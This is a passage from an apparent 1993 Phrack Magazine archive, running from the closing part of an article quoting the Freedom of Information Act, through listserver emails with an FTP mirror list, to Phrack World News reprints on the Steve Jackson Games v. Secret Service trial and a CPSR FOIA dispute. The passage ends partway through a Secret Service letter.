  9998. case the agency shall nonetheless provide copies of such index on request at a
  9999. cost not to exceed the direct cost of duplication.  A final order, opinion,
  10000. statement of policy, interpretation, or staff manual or instruction that
  10001. affects a member of the public may be relied on, used, or cited as precedent
  10002. by an agency against a party other than an agency only if-
  10003.       (i) it has been indexed and either made available or published as
  10004.     provided by this paragraph; or
  10005.       (ii) the party has actual and timely notice of the terms thereof.
  10006.   (3) Except with respect to the records made available under paragraphs (1)
  10007. and (2) of this subsection, each agency, upon any request for records which
  10008. (A) reasonably describes such records and (B) is made in accordance with
  10009. published rules stating the time, place, fees (if any), and procedures to be
  10010. followed, shall make the records promptly available to any person.
  10011.   (4)(A) In order to carry out the provisions of this section, each agency
  10012. shall promulgate regulations, pursuant to notice and receipt of public
  10013. comment, specifying a uniform schedule of fees applicable to all constituent
  10014. units of such agency.  Such fees shall be limited to reasonable standard
  10015. charges for documents search and duplication and provide for recovery of only
  10016. the direct costs of such search and duplication.  Documents shall be furnished
  10017. without charge or at a reduced charge where the agency determines that waiver
  10018. or reduction of the fee is in the public interest because furnishing the
  10019. information can be considered as primarily benefiting the general public.
  10020.      (B) On complaint, the district court of the United States in the district
  10021.    in which the complainant resides, or has his principal place of business,
  10022.    or in which the agency records are situated, or in the District of
  10023.    Columbia, has jurisdiction to enjoin the agency from withholding agency
  10024.    records and to order the production of any agency records improperly
  10025.    withheld from the complainant.  In such a case the court shall determine
  10026.    the matter de novo, and may examine the contents of such agency records in
  10027.    camera to determine whether such records or any part thereof shall be
  10028.    withheld under any of the exemptions set forth in subsection (b) of this
  10029.    section, and the burden is on the agency to sustain its action.
  10030.      (C) Notwithstanding any other provision of law, the defendant shall serve
  10031.          an answer or otherwise plead to any complaint made under the
  10032.          subsection within thirty days after service upon the defendant of the
  10033.          pleading i which such complaint is made, unless the court otherwise
  10034.          directs for good cause shown.
  10035.      (D) Except as to cases the court considers of greater importance,
  10036.          proceedings before the district court, as authorized by this
  10037.          subsection, and appeals therefrom, take precedence on the docket over
  10038.          all cases and shall be assigned for hearing and trial or for argument
  10039.          at the earliest practicable date and expedited in every way.
  10040.      (E) The court may assess against the United States reasonable attorney
  10041.          fees and other litigation costs reasonably incurred in any case under
  10042.          this section in which the complainant has substantially prevailed.
  10043.      (F) Whenever the court orders the production of any agency records
  10044.          improperly withheld from the complainant and assesses against the
  10045.          United States reasonable attorney fees and other litigation costs,
  10046.          and the court additionally issues a written finding that the
  10047.          circumstances surrounding the withholding raise we questions whether
  10048.          agency personnel acted arbitrarily or capriciously with respect to
  10049.          the withholding, the Civil Service Commission shall promptly initiate
  10050.          a proceeding to determine whether disciplinary action is warranted
  10051.          against the officer or employee who was primarily responsible for the
  10052.          withholding.  The Commission, after investigation and consideration of
  10053.          the evidence submitted, shall submit its findings and recommendations
  10054.          to the administrative authority of the agency concerned and shall
  10055.          send copies of the findings and recommendations to the officer or
  10056.          employee or his representative.  The administrative authority shall
  10057.          take the corrective action that the Commission recommends.
  10058.      (G) In the event of noncompliance with the order of the court, the
  10059.          district court may punish for contempt the responsible employee, and
  10060.          in the case of a uniformed service, the responsible member.
  10061.   (5)  Each agency having more than one members shall maintain and make
  10062. available for public inspection a record of the final votes of each member in
  10063. every agency proceeding.
  10064.   (6)(A) Each agency, upon any request for records made under paragraph
  10065. (1),(2), or (3) of the subsection, shall-
  10066.        (i) determine within ten days (except Saturdays, Sundays, and legal
  10067.      public holidays) after the receipt of any such request whether to comply
  10068.      with such request and shall immediately notify the person making such
  10069.      request of such determination and the reasons therefor, and of the right
  10070.      of such person to appeal to the head of the agency and adverse
  10071.      determination; and
  10072.        (ii) make a determination with respect to any appeal within twenty days
  10073.      (excepting Saturdays, Sundays, and legal public holidays) after the
  10074.      receipt of such appeal.  If on appeal the denial of the request for
  10075.      records is in whole or in part upheld, the agency shall notify the person
  10076.      making such request of the provisions for judicial review of that
  10077.      determination under paragraph (4) of this subsection.
  10078.      (B) In unusual circumstances as specified in this subparagraph, the time
  10079.   limits prescribed in either clause (i) or clause (ii) of subparagraph (A)
  10080.   may be extended by written notice to the person making such request setting
  10081.   forth the reasons for such extension and the date on which a determination
  10082.   is expected to be dispatched.  NO such notice shall secify a date that
  10083.   would result in an extension for more than ten working days.  As used in
  10084.   this subparagraph, "unusual circumstances" means, but only to the extent
  10085.   reasonably necessary to the proper processing of the particular request-
  10086.        (i) the need to search for and collect the requested records from field
  10087.      facilities or other establishments that are separate from the office
  10088.      processing the request;
  10089.        (ii) the need to search for, collect, and appropriately examine a
  10090.      voluminous amount of separate and distinct records which are demanded in
  10091.      a single request; or
  10092.        (iii) the need for consultation, which shall be conducted with all
  10093.      practicable speed, with another agency having a substantial interest in
  10094.      the determination of the request or among two or more components of the
  10095.      agency having substantial subject-matter interest therein.
  10096.      (C) Any person making a request to any agency for records under paragraph
  10097.   (1), (2), or (3) of this subsection shall be deemed to have exhausted his
  10098.   administrative remedies with respect to such request if the agency fails
  10099.   comply with the applicable time limit provisions of this paragraph.  If the
  10100.   Government can show exceptional circumstances exist and that the agency is
  10101.   exercising due diligence in responding to the request, the court may retain
  10102.   jurisdiction and allow the agency addition time to complete its review of
  10103.   the record.  Upon any determination by an agency to comply with a request
  10104.   for records, the records shall be made promptly available to such person
  10105.   making such request.  Any notification of denial of any request for records
  10106.   under this subsection shall set forth the names and titles or positions of
  10107.   each person responsible for the denial of such request.
  10108. (b) This section does not apply to matters that are-
  10109. (1) (A) specifically authorized under criteria established by an Executive
  10110.  Order to be kept secret in the interest of national defense or foreign policy
  10111.  and (B) are in fact properly classified pursuant to each Executive Order;
  10112. (2) related solely to the internal personnel rules and practices of the
  10113.  agency;
  10114. (3) specifically exempted from disclosure by statute;
  10115. (4) trade secrets and commercial or financial information obtained from a
  10116.  person and privileged or confidential;
  10117. (5) inter-agency or intra-agency memorandums or letters which would not be
  10118.  available by law to a party other than an agency in litigation with the
  10119.  agency;
  10120. (6) personnel and medical files and similar files the disclosure of which
  10121.  would constitute a clearly unwarranted invasion of personal privacy;
  10122. (7) investigatory records compiled for law enforcement purposes, but only to
  10123.  the extent that the production of such records would (A) interfere with
  10124.  enforcement proceeding, (B) deprive a person of a right to a fair trial or an
  10125.  impartial adjudication, (C) constitute an unwarranted invasion of personal
  10126.  privacy, (D) disclose the identity of a confidential source and, in the case
  10127.  of a record compiled by a criminal law enforcement authority in the course of
  10128.  a criminal investigation, or by an agency conducting a lawful national
  10129.  security intelligence investigation, confidential information only furnished
  10130.  by the confidential source, (E) disclose investigative techniques and
  10131.  procedures, or (F) endanger the life or physical safety of law enforcement
  10132.  personnel;
  10133. (8) contained in or related to examination, operating or condition reports
  10134.  prepared by, one behalf of, or for the use of an agency responsible for the
  10135.  regulation or supervision of financial institutions; or
  10136. (9) geological and geophysical information and data, including maps,
  10137. concerning wells.
  10138.  
  10139. Any responsible segregable portion of a record shall be provided to any person
  10140. requesting such record after deletion of the portions which are exempt  under
  10141. the subsection.
  10142.   (c) This section does not authorize withholding of information or limit the
  10143. availability of records to the public, except as specifically stated in this
  10144. section.  This section is not authority to withhold information from Congress.
  10145.   (d) On or before March 1 of each calendar year each agency shall submit a
  10146. report covering the preceding calendar year to the Speaker of the House of
  10147. Representatives and President of the Senate for referral to the appropriate
  10148. committees of Congress.  The report shall include-
  10149.   (1) the number of determinations made by such agency not to comply with
  10150.  requests for records made to such agency under subsection (a) and the reasons
  10151.  for each determination;
  10152.   (2) the number of appeals made by persons under subsection (a)(6), the
  10153.  result of such appeals, and the reason for the action upon each appeal that
  10154.  results in a denial of information;
  10155.   (3) the names and titles or positions of each person responsible for the
  10156.  denial of records requested under this section, and the number of instances
  10157.  for participation of each;
  10158.   (4) the results of each proceeding conducted pursuant to subsection
  10159.  (a)(4)(F), including a report of the disciplinary action taken against the
  10160.  officer or employee who was primarily responsible for improperly withholding
  10161.  records or an explanation of why disciplinary action was not taken;
  10162.   (5) a copy of every rule made by such agency regarding this section;
  10163.   (6) a copy of the fee schedule and the total amount of fees collected by the
  10164. agency for making records available under this section; and
  10165.   (7) such other information as indicates efforts to administer fully this
  10166. section.
  10167.  
  10168. The Attorney General shall submit an annual report on or before March 1 of
  10169. each calendar year which shall include for the prior year a listing of the
  10170. number of cases arising under this section, the exemption involved in each
  10171. case, the disposition of such case, and the cost, fees, and penalties assessed
  10172. under subsections (a)(4)(E),(F), and (G).  Such report shall also include a
  10173. description of the efforts undertaken by the Department of Justice to
  10174. encourage agency compliance with this section.
  10175.   (e) for purposes of this section, the term "agency" is defined in section
  10176. 551(1) of this title includes any executive department, military department,
  10177. Government corporation, Government controlled corporation, or other
  10178. establishment in the executive branch of the Government (including the
  10179. Executive Office of the President), or any independent agency.
  10180. ------------------------------------------------------------------------------
  10181.  
  10182. In Conclusion:
  10183.  
  10184.     The Freedom of Information Act is a powerful tool that can be used to
  10185. benefit yourself and to find out what the feds keep in their log books on you.
  10186. Use it, just don't abuse it.  It gives the individual much power over the
  10187. government.  We no longer have to prove a reason to know the information, but
  10188. we have a right to know the information.  Its the government's job to keep the
  10189. information away from us.  I would also like to mention that regulations and
  10190. all documents that agencies carry can be found in any major library.  This
  10191. will save you cash and frustration.  Anyways, keep the faith, its not that bad
  10192. out there.  And watch comedy central, its good for you.
  10193.  
  10194. Greets to:  All the good users on atdt, the works, tlitd.  Stargazer, daemon,
  10195. joker, shadow, the hopeless warez fanatics.  Deranged derelict, jt, and all
  10196. the other virtual friends I forgot.
  10197.  
  10198. --------------------------------------------------------------------------------
  10199.  
  10200.  
  10201.  
  10202.  
  10203. Date:     Wed Mar 24, 1993  6:04 pm  PST
  10204. From:     phrack
  10205.           EMS: INTERNET / MCI ID: 376-5414
  10206.           MBX: phrack@stormking.com
  10207.  
  10208. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  10209. TO:       Proctor & Associates / MCI ID: 399-1080
  10210. TO:       Peter Nesbitt / MCI ID: 511-1312
  10211. TO:     * Berton Corson / MCI ID: 528-0397
  10212. TO:       Michael W. Carroll / MCI ID: 557-1860
  10213. TO:       Michael McMahon / MCI ID: 585-7625
  10214. TO:       Multiple recipients of list
  10215.           EMS: INTERNET / MCI ID: 376-5414
  10216.           MBX: phrack@stormking.com
  10217. Subject:  Phrack 42/15-14
  10218.  
  10219. Hello,
  10220.  
  10221.         As of this message, the distribution of Phrack is done.  There
  10222. should have been 14 parts that arrived in 4 sets.  If you did not get them,
  10223. or signed up too late, PLEASE do not request copies.  We do not have the
  10224. capability to do that.  Please follow the FTP list that follows.
  10225.  
  10226.         It also seems that there is alot of discussion of items mentioned
  10227. in the Index.  PLEASE do not reply to PHRACK@STORMKING.COM for this.  This
  10228. will slow down your message getting to the proper people.  The correct
  10229. address is PHRACKSUB@STORMKING.COM for comments.
  10230.  
  10231.         Any LISTSERVER questions can be directed to SERVER@STORMKING.COM
  10232.  
  10233.  
  10234.                                                 StormKing ListServer
  10235.  
  10236.  
  10237.  Phrack FTP Sites
  10238.  ~~~~~~~~~~~~~~~~
  10239. quartz.rutgers.edu   (128.6.60.6)           mc.lcs.mit.edu  (18.26.0.179)
  10240.     Location: /pub/computer/law             Location: /its/ai/digex
  10241.  
  10242. mintaka.lcs.mit.edu   (18.26.0.36)          coombs.anu.edu.au  (130.56.96.2)
  10243.     Location: /telecom-archives             Location: /inbound
  10244.  
  10245. wuarchive.wustl.edu   (128.252.135.4)       ftp.eff.org  (192.88.144.4)
  10246.     Location: /doc/policy/pub/cud/Phrack    Location: /pub/cud/Phrack
  10247.  
  10248. nic.funet.fi   (128.214.6.100)              cs.dal.ca  (129.173.4.5)
  10249.     Location: /pub/doc/phrack               Location: /pub/comp.archives
  10250.  
  10251. chsun1.spc.uchicago.edu  (128.135.46.7)     ftp.uu.net  (137.39.1.9)
  10252.     Location: /pub/cud/phrack               Location: /tmp
  10253.  
  10254. rascal.ics.utexas.edu   (128.83.138.20)     relay.cs.toronto.edu  (128.100.3.6)
  10255.     Location: /misc/ra/sa/ULM.DE            Location: /doc/telecom-archives
  10256.  
  10257. aix370.rrz.uni-koeln.de   (134.95.132.2)
  10258.     Location: /pub/usenet/comp.archives/hackers/journals
  10259.  
  10260. titania.mathematik.uni-ulm.de   (134.60.66.21)
  10261.     Location: /info
  10262.  
  10263. src.doc.ic.ac.uk   (146.169.3.7)
  10264.     Location: /usenet/comp.archives/hackers/journals
  10265.  
  10266. bric-a-brac.apple.com   (130.43.2.3)
  10267.     Location: /pub/stud_reps
  10268.  
  10269. faui43.informatik.uni-erlangen.de   (131.188.31.3)
  10270.     Location: /portal/mounts/cyber/pcd/freeware2/magazine
  10271.  
  10272. srawgw.sra.co.jp   (133.137.4.3)
  10273.     Location: /.a/sranha-bp/arch/arch/comp.archives/hackers/sites
  10274.  
  10275.  
  10276.  
  10277.  
  10278. Date:     Wed Mar 24, 1993  6:11 pm  PST
  10279. From:     phrack
  10280.           EMS: INTERNET / MCI ID: 376-5414
  10281.           MBX: phrack@stormking.com
  10282.  
  10283. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  10284. TO:       Proctor & Associates / MCI ID: 399-1080
  10285. TO:       Peter Nesbitt / MCI ID: 511-1312
  10286. TO:     * Berton Corson / MCI ID: 528-0397
  10287. TO:       Michael W. Carroll / MCI ID: 557-1860
  10288. TO:       Michael McMahon / MCI ID: 585-7625
  10289. TO:       Multiple recipients of list
  10290.           EMS: INTERNET / MCI ID: 376-5414
  10291.           MBX: phrack@stormking.com
  10292. Subject:  Phrack 42/14-14
  10293.  
  10294.                               ==Phrack Magazine==
  10295.  
  10296.                   Volume Four, Issue Forty-Two, File 14 of 14
  10297.  
  10298.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  10299.               PWN                                             PWN
  10300.               PWN              Phrack World News              PWN
  10301.               PWN                                             PWN
  10302.               PWN        Compiled by Datastream Cowboy        PWN
  10303.               PWN                                             PWN
  10304.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  10305.  
  10306.  
  10307.               STEVE JACKSON GAMES v. UNITED STATES SECRET SERVICE
  10308.  
  10309.  Rights To Be Tested In Computer Trial                         January 20, 1993
  10310.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10311.  by Joe Abernathy (The Houston Chronicle)(Page A13)
  10312.  *Reprinted With Permission*
  10313.  
  10314.                         Summary Judgment Denied In Case
  10315.  
  10316. AUSTIN -- A judge Tuesday denied plaintiff lawyers' request for summary
  10317. judgment in a case brought against the U.S. Secret Service to set the bounds of
  10318. constitutional protections for electronic publishing and electronic mail.
  10319.  
  10320. U.S. District Judge Sam Sparks acted after hearing complicated arguments
  10321. regarding application of 1st and 4th Amendment principles in  computer-based
  10322. communications and publishing.  The case will go to trial at 9 a.m. today.
  10323.  
  10324. "Uncontested facts show the government violated the Privacy Protection Act and
  10325. the Electronic Communications Privacy Act," said Pete Kennedy, attorney for
  10326. Steve Jackson Games, an Austin game company that brought the lawsuit.
  10327.  
  10328. Mark W. Batten, attorney for the Department of Justice, which is defending the
  10329. Secret Service, declined to comment on the proceedings.
  10330.  
  10331. Steve Jackson's company, which publishes fantasy role-playing games -- not
  10332. computer games -- was raided by the Secret Service on March 1, 1990, during a
  10333. nationwide sweep of suspected criminal  computer hackers.
  10334.  
  10335. Agents seized several computers and related hardware from the company and from
  10336. the Austin home of Steve Jackson employee Loyd Blankenship.  Taken from the
  10337. game publisher was an electronic bulletin board used to play-test games before
  10338. they were printed and exchange electronic mail with customers and free-lance
  10339. writers.
  10340.  
  10341. Another seized computer contained the text of the company's work in progress,
  10342. GURPS Cyberpunk, which was being prepared for the printers.
  10343.  
  10344. Blankenship's purported membership in the Legion of Doom -- a group of computer
  10345. hackers from Austin, Houston and New York -- led the Secret Service to Steve
  10346. Jackson's door.
  10347.  
  10348. Neither Jackson nor his company was suspected of wrongdoing.
  10349.  
  10350. The game publisher is named in two paragraphs of the 42-paragraph affidavit
  10351. requesting the 1990 search warrant, which targeted Blankenship -- a fact
  10352. Kennedy cited in seeking summary judgment.
  10353.  
  10354. Kennedy presented evidence that the original Secret Service affidavit for the
  10355. warrant used to raid Steve Jackson Games contained false statements.
  10356. Supporting documentation showed that Bellcore expert Henry Kluepfel disputes
  10357. statements attributed to him that accounted for the only link between Steve
  10358. Jackson Games and the suspicion Blankenship was engaged in illegal activity.
  10359.  
  10360. Batten came away visibly shaken from questioning by Sparks, and later had a
  10361. tense exchange with Kennedy outside the courtroom.
  10362.  
  10363. The lawsuit contends the government violated 1st Amendment principles by
  10364. denying the free speech and public assembly of callers to Jackson's bulletin
  10365. board system, Illuminati.  This portion of the complaint was brought under the
  10366. Privacy Protection Act, which also covers the seized Cyberpunk manuscripts --
  10367. if the judge rules that such a book, stored electronically prior to
  10368. publication, is entitled to the same protections as a printed work.
  10369. The government lawyers argued the Privacy Protection Act applies only to
  10370. journalistic organizations -- an argument Sparks didn't seem to buy.
  10371.  
  10372. The lawsuit also contends 4th Amendment principles providing against
  10373. unreasonable search and seizure were violated, on grounds the Electronic
  10374. Communications Privacy Act specifies protection for publishers.
  10375.  
  10376. The Justice Department contends electronic mail does not enjoy constitutional
  10377. protections.
  10378.  
  10379. "They (users of Illuminati) had no expectation of privacy in their electronic
  10380. mail messages," Batten said.  The basis of the argument is that Illuminati's
  10381. callers were not sending communications to others, but rather "revealing" them
  10382. to a third party, Steve Jackson, thus negating their expectation of privacy.
  10383. _______________________________________________________________________________
  10384.  
  10385.  Computer Case Opens; Agent Admits Errors                      January 27, 1993
  10386.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10387.  by Joe Abernathy (The Houston Chronicle)(Page A11)
  10388.  *Reprinted With Permission*
  10389.  
  10390. AUSTIN -- Plaintiff's attorneys wrested two embarrassing admissions from the
  10391. U.S. Secret Service on the opening day of a federal civil lawsuit designed to
  10392. establish constitutional protections for electronic publishing and electronic
  10393. mail.
  10394.  
  10395. Special Agent Timothy Folly of Chicago admitted that crucial statements were
  10396. erroneous in an affidavit he used to obtain warrants in a 1990 crackdown on
  10397. computer crime.
  10398.  
  10399. Foley also conceded that the Secret Service's special training for computer
  10400. crime investigators overlooks any mention of a law that limits search-and-
  10401. seizure at publishing operations.
  10402.  
  10403. The case before U.S. District Judge Sam Sparks was brought by Steve Jackson
  10404. Games, an Austin game publisher, with the support of electronic civil rights
  10405. activists who contend that federal agents have overstepped constitutional
  10406. bounds in their investigations of computer crime.
  10407.  
  10408. Jackson supporters already have committed more than $200,000 to the litigation,
  10409. which seeks $2 million in damages from the Secret Service and other defendants
  10410. in connection with a March 1990 raid on Jackson Games.
  10411.  
  10412. Plaintiffs hope to establish that First Amendment protections of the printed
  10413. word extend to electronic information and to guarantee privacy protections for
  10414. users of computer bulletin board systems, such as one called Illuminati that
  10415. was taken in the raid.
  10416.  
  10417. Steve Jackson's attorney, Jim George of Austin, focused on those issues in
  10418. questioning Foley about the seizure of the personal computer on which
  10419. Illuminati ran and another PC which contained the manuscript of a pending
  10420. Jackson Games book release, "GURPS Cyberpunk."
  10421.  
  10422. "At the Secret Service computer crime school, were you, as the agent in charge
  10423. of this investigation, made aware of special rules for searching a publishing
  10424. company?"  George asked Foley.  He was referring to the Privacy Protection Act,
  10425. which states that police may not seize a work in progress from a publisher.  It
  10426. does not specify what physical form such a work must take.
  10427.  
  10428. Foley responded that the Secret Service does not teach its agents about those
  10429. rules.
  10430.  
  10431. Earlier, Foley admitted that his affidavit seeking court approval to raid
  10432. Jackson Games contained an error.
  10433.  
  10434. During the raid -- one of several dozen staged that day around the country in
  10435. an investigation called Operation Sun Devil -- agents were seeking copies of a
  10436. document hackers had taken from the computer system of BellSouth.
  10437.  
  10438. No criminal charges have been filed against Jackson, his company, or others
  10439. targeted in several Austin raids.  The alleged membership of Jackson employee
  10440. Loyd Blankenship in the Legion of Doom hacker's group -- which was believed
  10441. responsible for the BellSouth break-in -- lead agents to raid Jackson Games at
  10442. the same time that Blankenship's Austin home was raided.
  10443.  
  10444. Foley's affidavit stated that Bell investigator Henry Kluepfel had logged on to
  10445. the Illuminati bulletin board and found possible evidence of a link between
  10446. Jackson Games and the Legion of Doom.
  10447.  
  10448. But George produced a statement from Kluepfel, who works for Bellcore, formerly
  10449. AT&T Bell Labs, disputing statements attributed to him in the affidavit.  Foley
  10450. acknowledged that part of the affidavit was erroneous.
  10451.  
  10452. The U.S. Department of Justice, which is defending the Secret Service, contends
  10453. that only traditional journalistic organizations enjoy the protections of the
  10454. Privacy Protection Act and that users of electronic mail have no reasonable
  10455. expectation of privacy.
  10456. _______________________________________________________________________________
  10457.  
  10458.  Judge Rebukes Secret Service For Austin Raid                  January 29, 1993
  10459.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10460.  by Joe Abernathy (The Houston Chronicle)(Page A21)
  10461.  *Reprinted With Permission*
  10462.  
  10463. AUSTIN -- A federal judge lambasted the U.S. Secret Service Thursday for
  10464. failing to investigate properly before it seized equipment from three Austin
  10465. locations in a 1990 crackdown on computer crime.
  10466.  
  10467. U.S. District Judge Sam Sparks' comments came on the final day of trial in a
  10468. lawsuit brought by Steve Jackson Games, an Austin publisher, with the support
  10469. of national computer rights activists.
  10470.  
  10471. The judge did not say when he will issue a formal ruling in the case.  In
  10472. addition to seeking $ 2 million in damages from the Secret Service and other
  10473. defendants, Jackson hopes to establish privacy and freedom of the press
  10474. protections for electronic information.
  10475.  
  10476. In a packed courtroom Thursday morning, Sparks dressed down Secret Service
  10477. Special Agent Timothy Foley of Chicago, who was in charge of the March 1, 1990,
  10478. raid on Jackson, one of his employees and a third Austin man.  No criminal
  10479. charges have been filed in connection with the raids.
  10480.  
  10481. "The Secret Service didn't do a good job in this case," Sparks said.  "We know
  10482. no investigation took place.  Nobody ever gave any concern as to whether
  10483. (legal) statutes were involved.  We know there was damage (to Jackson)."
  10484.  
  10485. The Secret Service has seized dozens of computers since the nationwide
  10486. crackdown began in 1990, but Jackson, a science fiction magazine and game book
  10487. publisher, is the first to challenge the practice.  A computer seized at
  10488. Jackson Games contained the manuscript for a pending book, and Jackson alleges,
  10489. among other things, that the seizure violated the Privacy Protection Act, which
  10490. prohibits seizure of publishers' works in progress.
  10491.  
  10492. Agents testified that they were not trained in that law at the special Secret
  10493. Service school on computer crime.
  10494.  
  10495. Sparks grew visibly angry when testimony showed that Jackson never was
  10496. suspected of a crime, that agents did no research to establish a criminal
  10497. connection between the firm and the suspected illegal activities of an
  10498. employee, and that they did not determine that the company was a publisher.
  10499.  
  10500. "How long would it have taken you, Mr. Foley, to find out what Steve Jackson
  10501. Games  did, what it was? " asked Sparks.  "An hour?
  10502.  
  10503. "Was there any reason why, on March 2, you could not return to Steve Jackson
  10504. Games a copy, in floppy disk form, of everything taken?
  10505.  
  10506. "Did you read the article in Business Week magazine where it had a picture of
  10507. Steve Jackson -- a law-abiding, tax-paying citizen -- saying he was a computer
  10508. crime suspect?
  10509.  
  10510. "Did it ever occur to you, Mr. Foley, that seizing this material could harm
  10511. Steve Jackson economically? "
  10512.  
  10513. Foley replied, "No, sir," but the judge offered his own answer:
  10514.  
  10515. "You actually did; you just had no idea anybody would actually go out and hire
  10516. a lawyer and sue you."
  10517.  
  10518. The judge's rebuke apparently convinced the government to close its defense
  10519. after the testimony from Foley, only one of several government witnesses on
  10520. hand.  Justice Department attorney Mark Battan entered subdued testimony
  10521. seeking to limit the award of monetary damages.
  10522.  
  10523. The judge's comments came after cross-examination of Foley by Pete Kennedy,
  10524. Jackson's attorney.
  10525.  
  10526. Sparks questioned Foley about the raid, focusing on holes in the search
  10527. warrant, why Jackson was not allowed to copy his work in progress after it was
  10528. seized, and why his computers were not returned after the Secret Service
  10529. analyzed them.
  10530.  
  10531. "The examination took seven days, but you didn't give Steve Jackson's computers
  10532. back for three months.  Why?" asked Sparks.
  10533.  
  10534. "So here you are, with three computers, 300 floppy disks, an owner who was
  10535. asking for it back, his attorney calling you, and what I want to know is why
  10536. copies of everything couldn't be given back in days.  Not months.  Days.
  10537.  
  10538. "That's what makes you mad about this case."
  10539.  
  10540. Besides alleging that the seizure violated the Privacy Protection Act, Jackson
  10541. alleged that since one of the computers was being used to run a bulletin board
  10542. system containing private electronic mail, the seizure violated the Electronic
  10543. Communications Privacy Act.
  10544.  
  10545. Justice Department attorneys have refused comment on the case, but contended in
  10546. court papers that Jackson Games is a manufacturer, and that only journalistic
  10547. organizations can call upon the Privacy Protection Act.
  10548.  
  10549. The government said that seizure of an electronic bulletin board system does
  10550. not constitute interception of electronic mail.
  10551.  
  10552. The Electronic Frontier Foundation committed more than $200,000 to the Jackson
  10553. suit.  The EFF was founded by Mitchell Kapor of Lotus Technology amid a
  10554. computer civil liberties movement sparked in large part by the Secret Service
  10555. computer crime crackdown that included the Austin raids.
  10556.  
  10557. "The dressing down of the Secret Service for their behavior is a major
  10558. vindication of what we've been saying all along, which is that there were
  10559. outrageous actions taken against Steve Jackson that hurt his business and sent
  10560. a chilling effect to everyone using bulletin boards, and that there were larger
  10561. principles at stake," said Kapor, contacted at his Cambridge, Massachusetts
  10562. office.
  10563.  
  10564. Shari Steele, who attended the trial as counsel for the EFF, said, "We're very
  10565. happy with the way the case came out.  That session with the judge and Tim
  10566. Foley is what a lawyer dreams about."
  10567. _______________________________________________________________________________
  10568.  
  10569.  Going Undercover In The Computer Underworld                   January 26, 1993
  10570.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10571.  by Ralph Blumenthal (The New York Times)(Page B1)
  10572.  
  10573.   [A 36-year old law enforcement officer from the East Coast masquerades
  10574.   as "Phrakr Trakr" throughout the nation's computer bulletin boards.
  10575.   As the organizer of the High-Tech Crime Network, he has educated other
  10576.   officers in over 28 states in the use of computer communications.
  10577.   Their goal is to penetrate some 3000 underground bbses where computer
  10578.   criminals trade in stolen information, child pornography and bomb
  10579.   making instructions.
  10580.  
  10581.   "I want to make more cops aware of high-tech crime," he said.  "The
  10582.   victims are everybody.  We all end up paying for it."]
  10583. _______________________________________________________________________________
  10584.  
  10585.  Hackers Breaking Into UC Computers                            January 23, 1993
  10586.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10587.  by T. Christian Miller (The San Francisco Chronicle)(Page A20)
  10588.  
  10589.  [According to the University of California, hackers have been breaking
  10590.   into the DOD and NASA through UC computer systems.  The investigation
  10591.   links over 100 computer hackers who have reportedly penetrated
  10592.   computers at UC Davis, UC Berkeley, NYU, FSU, and CSU.  The FBI stated
  10593.   that the investigation reached as far as Finland and Czechoslovakia
  10594.   but did not comment on any arrests.
  10595.  
  10596.   University officials have asked all users to change to more complex
  10597.   passwords by April 1.]
  10598.  
  10599. _______________________________________________________________________________
  10600.  
  10601.  Feds Sued Over Hacker Raid At Mall                            February 5, 1993
  10602.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10603.  by Joe Abernathy (The Houston Chronicle)(Page A5)
  10604.  
  10605.  [A lawsuit was filed 2-4-93 in the Washington, D.C. federal court to
  10606.   force the secret service to disclose its involvement in the disruption
  10607.   of a meeting of computer hackers last year.  The meeting, a monthly
  10608.   gathering of readers of "2600 Magazine" at the Pentagon City Mall was
  10609.   disrupted on November 6, 1992, when mall security and Arlington County
  10610.   Police questioned and searched the attendees.
  10611.  
  10612.   The suit was filed by the Computer Professionals for Social
  10613.   Responsibility.  "If this was a Secret Service operation, it raises
  10614.   serious constitutional questions," said Marc Rotenberg, director of
  10615.   CPSR.
  10616.  
  10617.   The Secret Service declined to comment on the matter.]
  10618.  
  10619. ----------
  10620.  
  10621.  
  10622. [New Info in 2600 Case - from email sent by CPSR]
  10623.  
  10624.      One month after being sued under the Freedom of Information
  10625. Act (FOIA), the Secret Service has officially acknowledged that
  10626. it possesses "information relating to the breakup of a meeting
  10627. of individuals at the Pentagon City Mall in Arlington, Virginia."
  10628. The admission, contained in a letter to Computer Professionals for
  10629. Social Responsibility (CPSR), confirms widespread suspicions that
  10630. the agency played a role in the detention and search of
  10631. individuals affiliated with "2600" Magazine at the suburban
  10632. Washington mall on November 6, 1992.
  10633.  
  10634.      CPSR filed suit against the Secret Service on February 4
  10635. after the agency failed to respond to the organization's FOIA
  10636. request within the statutory time limit.  In its recent response,
  10637. the Secret Service released copies of three news clippings
  10638. concerning the Pentagon City incident but withheld other
  10639. information "because the documents in the requested file contain
  10640. information compiled for law enforcement purposes."  While the
  10641. agency asserts that it possesses no "documentation created by the
  10642. Secret Service chronicling, reporting, or describing the breakup
  10643. of the meeting," it does admit to possessing "information provided
  10644. to the Secret Service by a confidential source which is
  10645. information relating to the breakup of [the] meeting."  Federal
  10646. agencies classify other law enforcement agencies and corporate
  10647. entities, as well as individuals, as "confidential sources."
  10648.  
  10649.      The propriety of the Secret Service's decision to withhold
  10650. the material will be determined in CPSR's pending federal lawsuit.
  10651. A copy of the agency's letter is reprinted below.
  10652.  
  10653. David L. Sobel                               dsobel@washofc.cpsr.org
  10654. Legal Counsel                                (202) 544-9240 (voice)
  10655. CPSR Washington Office                       (202) 547-5481 (fax)
  10656.  
  10657. ************************************************
  10658.  
  10659.  
  10660.                     DEPARTMENT OF THE TREASURY
  10661.                    UNITED STATES SECRET SERVICE
  10662.  
  10663.                                     MAR 5 1993
  10664.  
  10665.                                     920508
  10666.  
  10667.  
  10668. David L. Sobel
  10669. Legal Counsel
  10670. Computer Professionals for
  10671. Social Responsibility
  10672. 666 Pennsylvania Avenue, S.E.
  10673. Suite 303
  10674. Washington, D.C.  20003
  10675.  
  10676. Dear Mr. Sobel:
  10677.  
  10678. This is in response to your Freedom of Information Act (FOIA)
  10679. request for access to "copies of all records related to the
